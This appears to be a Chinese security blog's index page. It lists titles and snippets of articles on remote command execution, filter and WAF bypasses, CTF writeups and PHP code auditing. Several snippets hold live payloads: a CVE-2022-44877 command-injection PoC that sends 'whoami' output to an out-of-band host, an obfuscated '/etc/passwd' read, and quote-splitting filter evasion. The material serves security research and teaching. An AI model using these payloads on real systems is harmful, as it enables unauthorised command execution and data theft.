分享一篇关于RCE(远程命令执行)的漏洞报告one.com/reports/1200647背景介绍Aiven是一家在云上提供数据库和消息服务等托管的公司。漏洞报告者jarij发现Aiven的Grafa...
02月15日安全文章19 views评论rce
smtp
通过修改grafana配置文件实现RCE
02月15日安全文章19 views评论rce
smtp
02月15日安全文章19 views评论rce
smtp
RCE bypass的一些小技巧##
免责声明:本文仅用于安全研究和教育目的。文章中的信息仅供参考,不应被用于非法用途。由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担...
01月14日17 views评论rce
防火墙
ctfshow Web入门[命令执行] web29-55 Writeup
命令执行及绕过技巧 web29 过滤了 flag 下面介绍一下 Linux 下几种绕过关键字过滤的方式 cat fl''ag.php cat fl""ag.ph...
12月15日17 views评论payload
writeup
无处不在的RCE
免责声明本公众号仅用于技术交流与学习,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号只是知识的搬运工,取之于民用之于民。如果大家不想错过文章推送的话,可以将...
12月01日12 views评论rce
xss
学习|baijiacms漏洞验证
baijiacms后台RCE项目地址:https://github.com/baijiacms/baijiacmsV4版本:V4.1.4 20170105 FINAL 环境:php 5.5.38ngi...
10月25日6 views评论payload
status
泄露PHP源代码中的硬核RCE,价值3000美元!
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与...
07月31日25 views评论rce
有效负载
堡垒机及其相关漏洞
堡垒机及其相关漏洞堡垒机堡垒机,又称运维安全审计系统,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段实时收集和监控网络环境中每一个组成部分的系统状态、安全事件、网络活动的服务...
05月31日131 views评论jumpserver
堡垒机
CVE-2022-44877 Control Web Panel Unauth RCE
POCPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host...
05月30日36 views评论ifs
rce
RCE/LFI Bypass的一些技巧
我们现在有一个pocc%0aat /et%0ac/pas%0aswd通过 globbing 绕过 Web 应用程序防火墙 (WAF)Bash 可以执行文件名通配,这个过程称为“通配”,但它不使用标准的...
05月09日77 views评论bypass
rce
Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877
POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Hos...
01月28日138 views评论rce
whoami
Bypass Linux Shell Restrictions
免责声明本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任...
11月25日63 views评论bypass
execute
PHP代码审计
PHP代码审计 challenge 9 访问页面,查看源码 <?php if(isset($_REQUEST[ 'ip' ])) { $target = trim($_REQUEST[ 'ip'...
10月17日115 viewsPHP代码审计已关闭评论SecIN安全技术社区
代码审计